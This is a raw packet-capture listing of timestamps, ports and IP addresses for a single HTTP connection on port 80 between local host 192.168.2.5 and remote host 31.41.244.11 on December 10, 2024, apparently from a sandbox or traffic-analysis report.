Dec 10, 2024 11:11:10.023576975 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.023618937 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.026066065 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.026132107 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.026195049 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.026242018 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.028615952 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.028667927 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.028697014 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.028737068 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.031183958 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.031241894 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.031306982 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.031361103 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.033771038 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.033822060 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.033853054 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.033891916 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.036312103 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.036381960 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.036415100 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.036454916 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.038893938 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.038933039 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.038944960 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.038970947 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.041461945 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.041512012 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.041681051 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.041732073 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.141429901 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.141442060 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.141556978 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.142076015 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.142127991 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.142175913 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.142220020 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.144280910 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.144328117 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.144356966 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.144397020 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.146508932 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.146570921 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.146604061 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.146646023 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.148709059 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.148768902 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.148819923 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.148861885 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.150832891 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.150881052 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.150963068 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.151005983 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.152988911 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.153029919 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.153083086 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.153125048 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.155056000 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.155113935 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.155153990 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.155200005 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.157104969 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.157146931 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.157180071 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.157221079 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.159221888 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.159301043 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.159337044 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.159373999 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.161165953 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.161222935 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.161289930 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.161334038 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.163199902 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.163249969 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.163285971 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.163328886 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.165085077 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.165143013 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.165224075 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.165266037 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.167048931 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.167104959 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.167135000 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.167177916 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.168967009 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.169043064 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.169079065 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.169131994 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.170882940 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.170938015 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.170964956 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.171005964 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.172826052 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.172880888 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.172940016 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.172979116 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.174742937 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.174798965 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.174853086 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.174890995 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.176727057 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.176784992 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.176949978 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.176992893 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.178576946 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.178622007 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.178713083 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.178751945 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.180555105 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.180594921 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.180630922 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.180654049 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.182449102 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.182511091 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.182558060 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.182606936 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.184360981 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.184417009 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.184436083 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.184475899 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.186304092 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.186356068 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.186364889 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.186407089 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.188250065 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.188293934 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.188298941 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.188354969 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.190222025 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.190274954 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.190304995 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.190344095 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.192095995 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.192141056 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.192192078 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.192228079 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.194067955 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.194113016 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.194143057 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.194181919 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.195960999 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.196005106 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.196079016 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.196122885 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.198116064 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.198127031 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.198160887 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.198175907 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.199815035 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.199866056 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.199934959 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.199981928 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.201724052 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.201770067 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.201783895 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.201828003 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.203649044 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.203691006 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.203725100 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.203779936 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.205621958 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.205682993 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.205749035 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.205790997 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.207504034 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.207550049 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.207583904 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.207629919 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.209435940 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.209475040 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.209517002 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.209553957 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.211319923 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.211368084 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.211442947 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.211498976 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.213249922 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.213294983 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.213325977 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.213366985 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.215254068 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.215302944 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.215521097 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.215564966 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.217143059 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.217187881 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.217258930 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.217300892 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.219079971 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.219126940 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.219199896 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.219249010 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.220948935 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.220994949 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.221079111 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.221118927 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.222912073 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.222980976 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.223009109 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.223069906 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.224921942 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.224941969 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.224973917 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.224992037 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.226803064 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.226850986 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.226880074 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.226922035 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.228740931 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.228831053 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.228856087 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.228874922 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.230628014 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.230669975 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.230727911 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.230766058 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.232531071 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.232574940 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.232651949 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.232696056 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.234472990 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.234560966 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.234580994 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.234630108 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.236417055 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.236476898 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.236510992 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.236555099 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.238306999 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.238358021 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.238385916 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.238429070 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.333708048 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.333785057 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.333842993 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.333894014 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.334532976 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.334584951 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.334613085 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.334656954 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.336087942 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.336153030 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.336226940 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.336272001 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.337630987 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.337675095 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.337748051 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.337793112 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.339443922 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.339488983 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.339721918 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.339765072 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.340806007 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.340854883 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.340862036 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.340902090 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.342381001 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.342442036 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.342447042 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.342488050 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.343833923 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.343878031 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.343938112 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.343982935 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.345325947 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.345371008 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.345444918 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.345489979 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.346899986 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.346946955 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.346956968 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.347002029 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.348314047 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.348360062 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.348426104 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.348476887 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.349855900 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.349904060 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.349926949 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.349972963 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.351208925 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.351255894 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.351351976 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.351394892 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.352710009 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.352776051 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.352869034 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.352915049 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.354135990 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.354149103 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.354187012 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.354203939 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.355506897 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.355566978 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.355603933 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.355652094 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.356933117 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.356978893 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.357055902 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.357100010 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.358436108 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.358481884 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.358494997 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.358537912 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.359608889 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.359652996 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.359744072 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.359788895 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.360989094 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.361033916 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.361056089 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.361097097 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.362349033 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.362395048 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.362426996 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.362469912 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.363785982 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.363830090 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.363852978 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.363898993 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.365081072 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.365128994 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.365185022 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.365228891 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.366378069 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.366425991 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.366442919 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.366485119 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.367750883 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.367798090 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.367892981 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.367939949 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.369143963 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.369190931 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.369246006 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.369297028 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.370455027 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.370501995 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.370620012 CET	80	49828	31.41.244.11	192.168.2.5
